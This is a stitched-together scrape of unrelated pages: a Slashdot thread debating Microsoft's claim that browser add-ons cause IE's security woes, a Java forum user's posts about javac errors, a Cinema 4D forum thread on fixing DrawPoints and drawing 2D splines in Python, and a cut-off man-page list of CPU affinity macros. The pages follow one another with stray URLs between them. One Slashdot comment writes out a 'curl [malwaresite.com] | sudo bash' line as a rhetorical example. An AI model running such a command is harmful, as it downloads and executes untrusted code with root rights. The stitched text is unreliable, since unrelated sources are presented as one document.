Should we really expect the average user to understand that allowing the add-ons to turn off sandbox mode isn't a good idea? At the very least, if an add-on wishes to turn off sandbox mode, a stern but CLEAR warning should be given to the user, and they should have to supply an administrator password. Of course, since vista bugs users for permission so much, most users would just click through the warning thoughtlessly. I bought my mother a Mac. When she used to use a PC, she would always get caught by trojans. Now I just tell her to never enter her admin password unless performing updates. Problem solved. Because OS X rarely asks for an admin password, when it does, users know that the program wants to do something serious. Re: (Score:3, Interesting) What everyday task does Vista bug you about authorizing? I've heard this a number of times how it nags people and that the initial release was rough but since SP1 I only see allow or deny when its something I'm doing intentionally that administrative related like installing an update to a program. I'm genuinely interested in this since I manage a lot of Windows machines and sooner or later I'll have to deal with common complaints or face turning UAC off. Re:Permissions (Score:4, Interesting) Are you sure? Are you really sure? Positive? Ok Re:Permissions (Score:4, Informative) right because your typical business users would never say want to change the extention of some think like report.txt they get mailed to them from a host system to something like report.csv so they can open it in Excel. Stuff like the never happens.... Re: (Score:3, Informative) I typical business user isn't ging to be storing "report.txt" in a protected system path. They are going to save it in My Documents or a subfolder, the default location presented by Vista. 
Re: (Score:2) If Microsoft puts out an OS which allows people to write third-party software for it, don't they have some obligation to make sure their OS can't be compromised by third parties? Re: (Score:2) They would be one of very few operating systems if that were the case. ATI drivers here on Ubuntu cause lock-ups all the time; sometimes I can't even ctrl+alt+backspace to restart X. In short, people are idiots and it is up to developers and administrators to do their jobs properly. All the issues out there are the result of lazy programmers, lazy administrators, or both. Re:Permissions (Score:4, Insightful) IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or by installing add-ons, then I would gather they would be to blame directly or indirectly for the end result. Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested) Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions) Re:Permissions (Score:5, Interesting) can they really be blamed for shoddy coding done by third parties? Yes they can, and here is why: if a program is going to allow add-ons, then the communication between the add-ons and the main application should be conducted entirely through interfaces [microsoft.com] in order to preserve abstraction and enforce Design by Contract [wikipedia.org] principles. In this way add-ons are allowed to plug into the application at precise locations controlled by the main application, and to interact with the main application abstractly and in precisely defined and limited ways.
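The interface-contract approach just described can be illustrated with a small sketch. This is not any real browser's plugin API -- just a hedged Python toy (all names invented) showing add-ons confined to an abstract interface, with the contract enforced at the registration point:

```python
from abc import ABC, abstractmethod

class BrowserAddon(ABC):
    """The only contract an add-on may implement. The add-on never
    sees the host's internals, only what the host passes in."""

    @abstractmethod
    def render(self, content: bytes) -> str:
        """Turn downloaded content into display text."""

class Host:
    def __init__(self):
        self._addons = []

    def register(self, addon):
        # Enforce the contract at the precise plug-in point.
        if not isinstance(addon, BrowserAddon):
            raise TypeError("add-ons must implement BrowserAddon")
        self._addons.append(addon)

    def show(self, content: bytes):
        # Add-ons interact with the host only through the abstract method.
        return [a.render(content) for a in self._addons]

class UpperCaser(BrowserAddon):
    """A trivial well-behaved add-on."""
    def render(self, content: bytes) -> str:
        return content.decode("ascii").upper()

host = Host()
host.register(UpperCaser())
print(host.show(b"hello"))   # -> ['HELLO']
```

An add-on that doesn't implement the interface is rejected before it ever runs, which is the "precise locations, precisely defined ways" point made above.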
Some people might argue that this is too limiting, but it has been my experience in developing software in this style that well-designed interface contracts can support a wealth of valuable features while maintaining pluggability and abstraction throughout the software stack. So I don't buy "it's the add-ons' fault", since the add-ons, ultimately, can only do things which the main application framework has allowed them to do, whether intentionally, through good abstraction, or unintentionally, from poor add-on framework design. Re: (Score:3, Informative) >IE7 is set to run in sandbox mode by default. I believe this is only on Vista. Re: (Score:2) Microsoft creates the environment in which these add-ons run. If that environment is too permissive, allowing add-ons to reach deep into your system, then this is still Microsoft's fault. They should only allow the add-ons to play in a very small sandbox with high walls. I've always said this. (Score:5, Insightful) The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine. This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used. Re: (Score:3, Informative) I could make some analogy with sex and condoms, but I don't have the energy. So I'll just put it simply: technical problem -> technical solution. No excuses. Re: (Score:3, Insightful) How about a car analogy? If you don't drive your car into downtown Liberty City, San Andreas, Vice City etc. you aren't as likely to get carjacked, even if you leave the top down and the doors unlocked. Same with a browser.
If you aren't going to places that are suspect, you won't be as likely to get malware. Layne Re:I've always said this. (Score:5, Informative) This is bull. I'll make an analogy for you with sex and condoms, since you suggested it, and it is a fairly apt analogy. Using the internet with a secure browser is like having sex with a condom. Using it with an insecure browser is like having sex without a condom. But in the end, condoms or no condoms, if you have sex with a person you know is carrying every kind of STD known to man (or is likely to be), you're the fool. And whether or not you use condoms, the best defense is being smart about your partners. Of course you should use condoms; that's just prudence. But the first line of defense is knowing who you're having sex with. And you'll note I said that the technical side of the issue shouldn't be ignored. The fact remains, though, that the most effective thing we can do is user training. This is too fun (Score:5, Funny) I like the sex analogies; I think this should be a new standard for /. Yours has some good points but: Surfing the web with IE is like if you were to go to a convenience store to buy eggs and discovered that you had to have sex with the mysterious man behind the counter in order to accomplish this task. Sure, you can be safe about it: wear condoms, only go to reputable convenience stores with clean-looking men behind the counter, etc. But isn't part of you wondering why you have to open yourself up in this way? Re: (Score:3, Funny) >>I like the sex analogies; I think this should be a new standard for /. Nonstarter. Reader-base is unfamiliar with the interface. Back to car analogies please. --Bargeld Re: (Score:2) With automated botnets scanning and attacking, even legitimate sites are getting exploited: Large-scale SQL injection attack [computerworld.com]. You could use something like siteadvisor.com [siteadvisor.com] to help protect yourself, if you aren't afraid of using something owned by McAfee.
It doesn't catch exploited sites instantaneously, but it helps you on the user-training front by marking large swaths of the internet as unsafe. Re: (Score:2) Actually, it's more like a stack of one-dollar bills the size of a football field inside the Library of Congress in the shape of a car. Re: (Score:2) Re: (Score:3, Funny) Re: (Score:2) I agree completely. My antivirus program says everything is fine, and so does my spyware killer. The only thing I can't quite figure out is that since I started on-line banking, it doesn't matter how much money I put in my account, the balance won't go above $5,000. :) Re: (Score:2) ... and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine. How do you know? Re: (Score:2) Welcome to the internet, I'll show you around. Re: (Score:2) Re:I've always said this. (Score:5, Insightful) I would agree with you, if "going" to a malware site meant curl [malwaresite.com] | sudo bash Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much market share that people confuse it with normality. "Going to" a site or "opening" an email doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver." Re: (Score:2, Insightful) I think your theory works for preventing the majority of issues, but it doesn't solve the problem. However careful you are, all it takes is one click to the wrong site, whether it be from a link in a forum, a search result, or clicking a known good server that has been owned, and you're infected. The problem is that the security of the browser should prevent someone from taking over your machine.
You can avoid walking down dark alleys at night, and you significantly cut down on your chances of getting Re: (Score:2) Re: (Score:2) Meh - I go to all kinds of dodgy sites, and have yet to have a virus. Obviously I get a few warnings, Firefox warns me about some stuff, and I never ever actually run anything from a source I don't trust. My personal opinion is that most people get viruses from emails their friends have sent them, which they click yes to. Vista's UAC is actually pretty useful for me. It rarely pops up when I'm doing normal stuff, and it does stop stuff from running as admin. I used to have antivirus on this box, but I Re: (Score:2) All men have two heads, but they can only think with one of them at a time. Now, if you're indulging in some "one-handed browsing," how secure your browser is may well be a factor in keeping your computer clean because sites like that are prime grazing ground for malware and trojans and spyware, Oh my! Re: (Score:2) You are assuming that valid sites you visit haven't been compromised so that they install malware, or that your upstream DNS didn't get hijacked. If your browser isn't secure eventually you will end up with problems no matter what sort of sites you visit. This particular article is just Microsoft trying to side-step the fact that something as simple as switching your browser from IE to something else can reduce your risk substantially. But remember (Score:5, Insightful) If it's Firefox, it's perfectly OK to blame the add-ons. Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed. And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines. Re: (Score:2, Insightful) I think the point has always been that it was easier to fix those leaks in the add-ons than to implement draconian quotas on add-ons in the browser. 
They were able to fix it to some degree, but all it's doing is preventing poorly-written add-ons from leaking memory. I think protecting the user from his add-ons is a superior technical solution, but it isn't Firefox's "fault" that the add-ons were written poorly. And I would in fact apply the same argument to IE and extend it to Windows: plugins to IE causing pro Re: (Score:2) "This [letmegoogl...foryou.com] page will make it crash every single time on this machine, for example." Using 3.1b1 and nothing strange happens. Add-ons: Adblock Plus, NoScript (off), Fasterfox Re: (Score:2) It didn't crash, and I'm definitely keeping that link! :) Re: (Score:2) 3.0.4 here, with the Adblock Plus, Foxmarks, FoxyProxy and User Agent Switcher plugins, and that site works fine. You have something screwed up on your machine. It's the Network! (Score:2) Around here, and many other places, I suspect, the generally accepted practice is to first blame the network when problems arise. The network usually isn't at fault, but we are still forced to jump through hoops before we can tell the user the network is fine; it's their poorly implemented config/script/filter that caused their problems. I see this as a similar practice... if some crap comes through the browser, it must be the browser's fault. Never mind that some toolbar or plugin or other enhancement left a Re: (Score:2) Love it when users try to blame their flaky network connections for files getting deleted. They certainly didn't delete the wrong file; their network connection is glitchy and "goes down" all the time, they tell me on their IP phone.... Re: (Score:2) I thought the generally accepted practice for MS was to first blame the video driver, and then blame the printer driver. *then* they might look at the problem :) Mind you, I agree with MS here; the biggest problem with the browser is the add-ins... ones like SmileyCentral, AdsULike, PhishingToolbar, AntiVirusCheckPro, and NoSpamHonestNoReally. Bullshit. Plain utter bullshit.
(Score:5, Insightful) Many non-power-users don't use add-ons at all. If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves. Re:Bullshit. Plain utter bullshit. (Score:4, Insightful) Many non-power-users don't use add-ons at all. And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up. Re: (Score:3, Informative) Yes, I'm still trying to figure out how to teach my Mom that she doesn't need EVERY toolbar in existence. Re: (Score:3, Informative) And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up. To be fair, those often get loaded by accident -- as part of installing Adobe Reader, or Java, or Skype, or whatever, and of course it's defaulted to install, so unless you read every page of the installation wizard, they get you. Re: (Score:2) What absence? [softpedia.com] Re:Bullshit. Plain utter bullshit. (Score:5, Insightful) Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" add-ons installed. If anything, I think "power users" are less likely to have random add-ons installed, since they actually bother to uncheck the "install random crap toolbar" box when they install something. Re: (Score:2) Yeah, bullshit is right; look at the examples given in the article and the summary: Flash, PDF, and QuickTime. Unless you categorize all the YouTube users as 'techies', eh? Re: (Score:2) I'm going to remember that next time I have to fix someone's computer and IE has 10 bullshit toolbars, 9 of which are malware. Re: (Score:2) From TFA: "The browser is becoming a harder target and there are many more browsers," Lawrence said. "So attackers are targeting add-ons."
But your IE add-on won't work in Firefox and the Firefox add-on won't work on Opera. How stupid do these people think we are? He added that attackers are finding add-ons with high market share, looking for vulnerabilities and then exploiting every browser through the add-on. Again, that's neither logical nor reasonable. Can anyone point to an add-on that has more users than ANY brand of browser? Re: (Score:3, Interesting) Can anyone point to an add-on that has more users than ANY brand of browser? Sun Java? Adobe Flash? Not sure about the former, but the latter has a much bigger installed base than IE. Re: (Score:2, Informative) Many non-power-users don't use add-ons at all. That's incorrect. Most of them install the add-ons without really knowing what they are doing, or don't uncheck the box that says "Install this toolbar you don't want" when installing software. Re: (Score:2) Many non-power-users don't use add-ons at all. Everybody (well, almost everybody, of course) has Flash installed nowadays. Re: (Score:2) I'm a power user, and I use add-ons ... Especially NoScript. It's really helpful on IE... No wait ... Never mind on the IE part. I haven't used Wine to load IE yet. Re: (Score:2) Did you miss the part where he said he hadn't loaded IE? NoScript is a Firefox add-on... Re: (Score:3, Informative) I think the article was not referring to add-ons in the sense that a geek thinks of them -- Adblock, Firebug, NoScript, etc. Instead, they mean the biggies -- Acrobat, Flash, QuickTime. Most systems will have some or all of those installed. Re: (Score:3, Interesting) Many non-power-users don't use add-ons at all. If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves. Many power users install only a minimal number of add-ons to do what we want. Stuff like Flashblock along with Flash. We don't need a dozen fool-bars or huge numbers of widgets. Tied down!
(Score:2, Insightful) Its browser woes are because the browser is the operating system and the operating system is the browser. Tie the two together and you reap what you sow! I think they have a point.. (Score:4, Funny) With the likes of ActiveX and Silverlight out there, who could blame IE? Re:I think they have a point.. (Score:4, Insightful) 28 comments and the lowly AC is the first to mention ActiveX, which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code. Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run! Re: (Score:3, Insightful) Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run! Are you trying to make a point that malware is IE's fault? Because if so, you just completely undercut it. What you said is true, and is the reason why users are the biggest threat to computer security, not the browser/OS/whatever. Re:I think they have a point.. (Score:5, Insightful) Users are always the biggest security threat. It's the OS's job to protect them. OS X and Linux seem to have no problem doing this, so why can't Windows? Speaking of add-ons (Score:5, Insightful) Would an example of this include the ActiveX control you have to install to be able to run Windows Update? Plugin model (Score:5, Insightful) Aren't they responsible for the plugin model in their browser? Aren't they responsible for the OS security? Take a look at how Chrome handles plugins and then try to pass the buck. Re:Plugin model (Score:4, Informative) Take a look at IE protected mode. Vista allows processes started by the user to run with different "integrity levels", effectively subdividing the user account into multiple ad-hoc roles while preserving the identity.
IE protected mode is run in "low integrity" -- where Vista at an intrinsic level protects against modifications to the file system, registry, network access etc. Every plugin is executed in the same process under the same restrictions. IE offers a standard broker process which can be requested when a file has been downloaded (into a protected cache) and needs to be moved to the user-selected download location. The browser process has very limited capabilities. If a plugin needs more advanced access than what is provided by this broker process, then it must install and invoke its own broker process, as the plugin itself runs under the restricted mode. Flash does this, circumventing the standard IE broker process. It was a bug in the Flash broker process (along with a Java vulnerability) which enabled a security researcher to execute a program on Vista in the Pwn2Own contest. Presumably Adobe will use the same approach on other browsers with a similar model, such as Chrome. That is why the security researcher was adamant that the Flash flaw could have been used against *any* of the OSes. Chrome actually *also* uses the Vista low-integrity feature. Presumably Google will emulate this Vista feature by using separate accounts on other OSes which do not have process integrity levels (or other role subdivisions of user accounts) as a standard feature. Chrome does use separate processes (in low-integrity mode) for each tab. That does not provide more security against a rogue process taking over the machine, but it does provide more robustness and protects the individual tabs against other tabs going rogue because of browser bugs. Re: (Score:2, Interesting) Yes, they are responsible for the plug-in architecture. However, the architecture only provides the mechanism through which the plug-ins are loaded and communicate with the browser; they don't provide any further facility. The plug-ins are simply binaries which are loaded into the process space of the browser.
The browser process dictates the security context under which the plug-in will execute. In all browsers on all platforms, if the plug-in has a vulnerability, exploiting that vulnerability gains the Yeah... that's the ticket (Score:2) But Windows is a security hole platform! (Score:2) After what was expected to be an unusually quiet Patch Tuesday, Microsoft has released eight patches for applications with an insufficient number of security holes [today.com]. Largely yes and largely ignorance (mitigation) (Score:5, Interesting) Exploits for specific document types make compromising people's machines an issue. However, what 99.9% of people that revel in schadenfreude over IE's woes miss or fail to understand (yeah, including many people on Slashdot) is that most Windows XP users (which are most Windows users, Vista is only 20%) run as "root"!!! ("administrator" in the Windows vernacular) I wrote a utility called RemoveAdmin, available on Download.com, that leverages an API in Windows (CreateRestrictedToken) that strips administrative rights. The installer will create shortcuts for IE and Firefox, but if you look carefully it's really a program with the browser .EXE passed as an argument. Which means you can strip administrative rights on anything you run... in fact that's exactly what I do. I don't run *anything* that talks on the Net without this. This means if you stumble across rigged .PDFs, Word documents, etc., etc., you won't suddenly have a keyboard logger installed because ignorant you is running with admin rights. (Some caveats) This is version 0.1. What would 1.0 have? A FAQ and user guide for starters. Also, I've seen this version not work in some cases, largely situations where AD is in play (probably because a user has multiple admin credentials). If you need to run ActiveX controls on a site (poor you if you use IE), just quit IE, go to the site, have the controls installed. Quit IE and re-run IE with the secure link.
Likewise, this is what you would do before going to Windows Update. And finally, to convince yourself the utility does something useful: go to any site, "View Source" after you run your browser with the secure link, and try to save the resultant .HTML/JavaScript to C:\Windows. You'll find you can't... since your browser process doesn't have administrative rights (root), and thus any process it launches doesn't either (think of this as a plug-in scenario). Maybe I'll educate some % of the IT world yet... Respectfully, -M Re: (Score:3, Insightful) But tell me FreakinSyco... how many people, think Joe and Jane Sixpack, run with non-administrative accounts at home under Windows XP? Even worse, 99% of IT people will do the same, i.e. rely on anti-virus vs. the principle of least privilege, which they'll call out in a heartbeat on *NIX ("Don't run as root!!!") but fail to do the same when at home under Windows XP. It's largely a user education issue. Few people know about the tools Windows does offer, and assume it's completely insecure (that's not true). Fur sandbox (Score:2) How about sandboxing the entire thing so that no matter what, with the flip of a switch, no writes to the HD are allowed, period (cookies or otherwise, I don't care to be tracked, and can remember more than one complex password). We could call it something scary, like jail. Or chroot jail. Think about it, next generation. I've given up on the current one. ABM (Score:3, Insightful) This is marketing. Blame ABM, Anybody But Microsoft. Truth is that IE is not the best browser, but it is better than it was. Firefox is also better than it was, so is Opera, so is WebKit (Safari). In the future, I expect Chrome, if it survives, to be better too. Why is any of this news? It is really just a marketing department's attempt to deflect blame away from where it belongs. It's really quite simple (Score:2) It's quite simple.
You/They/We can define a very simple interface that displays some stuff and allows a few simple user inputs, and maybe after a few years of debugging we might have a reliable browser suitable for basic stuff -- including financial data transfers and buying and selling stuff. Or we can continue to try to do everything in the world in our browsers and then act really surprised when our PC starts relaying 20 thousand spam messages a day or our money and/or data and/or identity ends up in Lich First Hand Refutation (Score:2, Informative) In any case, I didn't really care what sort of virus or malware or autodialer or rootkit or killprog or hypnotoad I picked u He's right you know ... (Score:4, Funny) And if you believe that, I've got this great piece of land I'd like to sell you. It's still your damn fault (Score:5, Insightful) Now let's see... why is it that we need add-ons for something as simple as playing a video on YouTube or streaming sound? Oh yeah, that's right: there are no cross-platform open standards for doing so, because SOMEBODY keeps failing to implement them. Seriously, even if the problem is buggy add-ons like Flash, the whole reason we need those add-ons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it were not for Microsoft's continued hampering of web standards, the majority of stuff Flash is currently being used for could easily have been implemented using just HTML and JavaScript. So blame the browser or blame the add-ons; it's still all your fault in the end. ActiveXploit (Score:4, Funny) Wait, did Microsoft just admit that ActiveX is one of the largest security holes ever? Listen to his comments for the full story (Score:3, Interesting) Quick note: This article is a spin-off of what Eric had to say during the most recent Black Hat Webcast, where Jeremiah Grossman was talking about clickjacking and other related browser issues.
Eric made a lot of sense talking about plug-ins and add-ons being the cross-platform low-hanging fruit. Listen and watch the webinar to hear what he had to say and keep everything in context: [on24.com] Or download the .m4b audio file when we get it online next week here: [blackhat.com]
http://tech.slashdot.org/story/08/11/21/2036222/microsoft-blames-add-ons-for-browser-woes
Type: Posts; User: Java_noob333

It's not throwing any errors any more. I just cannot figure out why it won't run the commands three times for each of the three variables (cat1, cat2, cat3).

Yeah, we haven't got to arrays. When I did code it to ask three times, it kept saying the variable had already been assigned. The program is supposed to get three cats' info and display it. I thought that Java would ask the input questions until all the variables were met, but it only asks once and then displays it three...

Thank you very much. Not sure why that worked, but it does.

Now I even tried using my notebook to do it and I am still getting the same error messages. Maybe I need to find an older build?

Thanks Mike. I changed that line but it still will not work. It still gives me the error: Could not find or load main class com.sun.tools.javac.Main. Still not sure what the problem is. I...

1. public class Hello { public static void main(String[] args) { System.out.printIN("Hello, world!"); } } 2. When I did the version check it came up with Javac 1.7.0_10. Any other ideas?

OK Shzylo, I uninstalled Java and completed the process exactly how it was done in the video and I am still receiving the same error. :( Any other suggestions?

Yep... C:\Documents and Settings\user>path PATH=C:\Program Files\AMD APP\bin\x86;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\system32\WindowsPowerShell\v1.0;C:\Program...

My path for javac is set to C:\Program Files\Java\jdk1.7.0\bin which is the default. I wrote out the Hello World program from my new book. Its path is c:\document and settings\user\My...
http://www.javaprogrammingforums.com/search.php?s=11b59083dd8eeed8501495b3fb845d62&searchid=1272932
DrawPoints - Invalid object length

On 17/08/2015 at 01:23, xxxxxxxx wrote: I am using ScottA's PyDraw Smooth Spline plugin to put a spline on the view (HUD), but I am getting a "ValueError: Invalid object length". Searching the forum, there are some related issues, but no solution yet? I am using R15 and R16.

cntrl_points = [cntrl_p1,cntrl_p2,cntrl_p3,cntrl_p4] #A list containing the control points
bd.SetPointSize(5.0) #Set the size of the points
col = [.9, .1, .1]*4 #Set the color of the CV points
bd.DrawPoints(cntrl_points, col, 3, None) #Draw the spline control points

On 17/08/2015 at 04:39, xxxxxxxx wrote: Hi Pim, Yes, there seems to be an issue in BaseDraw.DrawPoints() with its last argument 'vn', the point normals, when it's None. To make it work, pass a valid list of normals (same count as the points). This issue will be fixed. In the code of the PyDraw Smooth Spline:
- Pass norm = [c4d.Vector(1)]*4 for the first call to DrawPoints() (4 points)
- Pass norm = [c4d.Vector(1)]*13 for the second call to DrawPoints() (13 points)
- The line cadr = [1]*924 for the second call to DrawPoints() is wrong; it has to be multiplied by 39 only (13*3).
If you find any bug or issue, do not hesitate to submit it, because the forum isn't a repository for bugs and they can be lost in threads (this one was).

On 17/08/2015 at 06:56, xxxxxxxx wrote: Thanks Yannick, it is working now. Another question: is there a faster/better way to select one of the points or handles of the spline in the HUD? -Pim PS Before I submit a bug, I like to be sure that it is not an error from my side.

On 17/08/2015 at 07:48, xxxxxxxx wrote: I just found that to make it work you can simply omit the 'vn' parameter, i.e. call DrawPoints() with only 3 parameters. Originally posted by xxxxxxxx Another question: is there a faster/better way to select one of the points or handles of the spline in the HUD?
ScottA uses the mouse position and compares it with the position of the points. I think the mouse checks to get the current control point moved should be done in MouseInput() after the call to win.MouseDragStart(), not in GetCursorInfo(). Originally posted by xxxxxxxx PS Before I submit a bug, I like to be sure that it is not an error from my side. The issue can be reproduced if None is passed for the 'vn' parameter, and I think there's the same issue with 'vc'.

On 17/08/2015 at 07:59, xxxxxxxx wrote: All clear now, thanks again.

On 24/08/2015 at 02:31, xxxxxxxx wrote: It works OK in R15, but in R16 the spline is displayed twice: once in the viewport/HUD and once normally. Here is the Draw code:

def Draw(self, doc, data, bd, bh, bt, flags):
    ################# This is the control points section ####################
    p1x = myDict['cp1x']
    p1y = myDict['cp1y']
    cntrl_p1 = c4d.Vector(p1x, p1y, 0)  #The first control point (the start of the spline)
    p2x = myDict['cp2x']
    p2y = myDict['cp2y']
    cntrl_p2 = c4d.Vector(p2x, p2y, 0)  #The second control point
    p3x = myDict['cp3x']
    p3y = myDict['cp3y']
    cntrl_p3 = c4d.Vector(p3x, p3y, 0)  #The third control point
    p4x = myDict['cp4x']
    p4y = myDict['cp4y']
    cntrl_p4 = c4d.Vector(p4x, p4y, 0)  #The fourth control point (the end of the spline)
    cntrl_points = [cntrl_p1, cntrl_p2, cntrl_p3, cntrl_p4]  #A list containing the control points
    bd.SetPointSize(15.0)  #Set the size of the points
    col = [.9, .1, .1]*4  #Set the color of the CV points
    bd.DrawPoints(cntrl_points, col, 3)  #Draw the spline control points

    ################# This is the spline's points section ####################
    steps = myDict['segments']  #The number of line segments
    s_points = smoothPoints(cntrl_points, steps)  #The points of the spline
    cadr = [1]*924  #Set the color values for the points
    bd.SetPointSize(3.0)
    bd.DrawPoints(s_points, cadr, 3)  #Draw points so we can see where each line in the spline begins/ends
    print "_points: ", s_points

    #Create a line between two points (except the last point) to create a spline
    size = len(s_points)
    for i in xrange(0, size-1):
        bd.SetPen(c4d.Vector(1, 1, 1))  #Set color for draw operations
        bd.DrawLine2D(c4d.Vector(s_points[i].x, s_points[i].y, 0), c4d.Vector(s_points[i+1].x, s_points[i+1].y, 0))

    c4d.EventAdd()
    return c4d.TOOLDRAW_HANDLES | c4d.TOOLDRAW_AXIS

In the documentation I do not see any relevant changes from R15 to R16. Also, is there a way to display and use tangents in the viewport/HUD?

On 24/08/2015 at 05:49, xxxxxxxx wrote: Changing bd.DrawPoints to bd.DrawPoint2D seems to solve the issue. Now only the 2D version is shown. Of course, bd.SetPointSize is not used; only a one-pixel point is displayed using DrawPoint2D. Still trying to find out how to display/set tangents. -Pim

On 24/08/2015 at 07:33, xxxxxxxx wrote: Hi Pim, I wrote this plugin using R13, and it works properly with that version. But Maxon keeps on making major changes to the SDK, especially the Python SDK. So try not to follow my code too closely; just use it as a general guide. With all of the changes they make to the SDK from version to version, you might have to completely re-write it for R16++. -ScottA

On 24/08/2015 at 08:01, xxxxxxxx wrote: Hi Scott, Thanks again for all your plugins, and yes, I use them mostly as guidelines. I learn a lot that way. It is step by step, but I think I am getting there. Now the main issue is how to get the tangents. -Pim

On 25/08/2015 at 01:12, xxxxxxxx wrote: Hi Pim, You can also use bd.DrawLine2D() to draw tangents.

On 25/08/2015 at 04:44, xxxxxxxx wrote: OK, does that mean I must write my own tangent calculation, or can I use SDK functions/routines?

On 25/08/2015 at 06:13, xxxxxxxx wrote: Originally posted by xxxxxxxx OK, does that mean I must write my own tangent calculation, or can I use SDK functions/routines? You may use the spline data and calculation in the API provided by SplineData.
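As an aside on the cadr = [1]*924 fix discussed earlier (the color list has to hold 3 components per point, e.g. 13 points -> 39 values), a tiny helper keeps the list sized to the point count automatically. This is plain Python, independent of c4d; the flat [r, g, b, r, g, b, ...] layout is assumed from the thread's 13*3 arithmetic rather than from official documentation:

```python
def flat_colors(points, rgb=(1.0, 1.0, 1.0)):
    """Build a flat [r, g, b, r, g, b, ...] color list sized to the
    point count, so it can never go out of sync with the points."""
    out = []
    for _ in points:
        out.extend(rgb)
    return out

pts = range(13)       # stand-in for 13 spline points
cadr = flat_colors(pts)
print(len(cadr))      # -> 39, i.e. 13 * 3
```

A call like bd.DrawPoints(s_points, flat_colors(s_points), 3) would then stay correct even if the number of spline samples changes.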
On 25/08/2015 at 07:43, xxxxxxxx wrote:

The only reason my plugin exists at all is because the C4D SDK doesn't have any 2D spline draw classes in it. And when I asked for help with how to make them myself, all I got were crickets chirping. After weeks and weeks of searching the internet for examples, I found mostly just the maths posted for this subject. The math for splines is quite complex, and not easy to convert into computer code. It took me quite a lot of time and effort to figure out how to draw a 2D spline to the editor view in C4D. Too long! I did not want anyone else to have to go through the same hell I went through just to draw a smooth cubic spline in 2D. So I posted my code for everyone to see how simple it is, once you have the complex maths converted into computer code.

So if there are people out there that do know how to write the tangents code part for this, or even have other types of code for drawing splines in their tool kit: please do what I did, pay it forward, and post an example for the rest of us to learn from. Posting a bunch of complex maths to a wiki does not help. We need to see it in code form. This is one of those subjects where good simple code examples were very difficult to find. Thanks, -ScottA

On 25/08/2015 at 12:23, xxxxxxxx wrote:

I have the following options/thoughts I still need to investigate.

1) C4DJack wrote an article on c4dprogramming on "drawing a spline in the viewport". I want to use that as a start, assuming viewport = HUD. So a 2D spline.
2) To calculate tangents, I want to use the code Martin provided.
3) And of course SplineData, as Yannick said: "You may use the spline data and calculation in the API provided by SplineData." I will ask him to elaborate on this (give me more details).

These are just some thoughts I still need to investigate.
-Pim

On 25/08/2015 at 12:25, xxxxxxxx wrote:

Originally posted by xxxxxxxx

Originally posted by xxxxxxxx

Ok, does that mean I must write my own tangent calculation, or can I use SDK functions/routines?

You may use the spline data and calculation in the API provided by SplineData.

Hi Yannick, Could you elaborate a bit more on what you mean? If possible, more details and directions to display a 2D (HUD) spline. -Pim
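The open question in this thread — how to get tangents for the curve that a smoothPoints()-style helper produces — has a compact answer for cubic Bézier segments: the tangent at parameter t is the derivative of the Bézier polynomial. The sketch below is standalone Python (it uses a small stand-in Vec class instead of c4d.Vector so it runs outside Cinema 4D; the function names are illustrative, not part of the C4D SDK). Inside a tool plugin, the resulting tangent vector could then be drawn with bd.DrawLine2D(), as suggested above:

```python
# Cubic Bezier point and tangent from 4 control points (p0..p3).
# Vec is a stand-in for c4d.Vector so the sketch runs anywhere.

class Vec:
    def __init__(self, x, y):
        self.x, self.y = x, y
    def __add__(self, o): return Vec(self.x + o.x, self.y + o.y)
    def __sub__(self, o): return Vec(self.x - o.x, self.y - o.y)
    def __mul__(self, s): return Vec(self.x * s, self.y * s)

def bezier_point(p0, p1, p2, p3, t):
    # B(t) = (1-t)^3 p0 + 3(1-t)^2 t p1 + 3(1-t) t^2 p2 + t^3 p3
    u = 1.0 - t
    return (p0 * (u**3) + p1 * (3 * u**2 * t) +
            p2 * (3 * u * t**2) + p3 * (t**3))

def bezier_tangent(p0, p1, p2, p3, t):
    # Derivative of the cubic Bezier: the curve's direction at t.
    u = 1.0 - t
    return ((p1 - p0) * (3 * u**2) +
            (p2 - p1) * (6 * u * t) +
            (p3 - p2) * (3 * t**2))

p0, p1, p2, p3 = Vec(0, 0), Vec(0, 100), Vec(100, 100), Vec(100, 0)
mid = bezier_point(p0, p1, p2, p3, 0.5)
tan = bezier_tangent(p0, p1, p2, p3, 0.5)
print(mid.x, mid.y)   # 50.0 75.0
print(tan.x, tan.y)   # 150.0 0.0
```

To draw the tangent handle at a spline point, one could draw a short segment from bezier_point(...) toward bezier_point(...) + bezier_tangent(...) scaled down to a handle length.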
https://plugincafe.maxon.net/topic/8995/11941_drawpoints--invalid-object-length
Operations on CPU affinity sets:

CPU_EQUAL - test equality of two sets
CPU_ZERO - clear all CPUs from set
CPU_SET - set a specified CPU in a set
CPU_CLR - unset a specified CPU in a set
CPU_ISSET - test if a specified CPU in a set is set
CPU_COUNT - return the number of CPUs currently set
CPU_AND - obtain the intersection of two sets
CPU_OR - obtain the union of two sets
CPU_XOR - obtain the mutually excluded set

#include <sched.h>

int CPU_EQUAL(cpu_set_t *set1, cpu_set_t *set2);

